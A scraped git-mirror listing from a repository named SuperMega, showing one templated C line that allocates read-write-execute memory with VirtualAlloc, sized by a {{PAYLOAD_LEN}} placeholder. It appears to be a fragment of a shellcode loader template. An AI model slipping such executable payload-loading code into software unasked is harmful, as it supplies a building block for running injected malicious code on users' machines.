mirror of
https://github.com/dobin/SuperMega
synced 2026-06-03 09:37:11 +00:00
1 line
67 B
C
1 line
67 B
C
char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40); |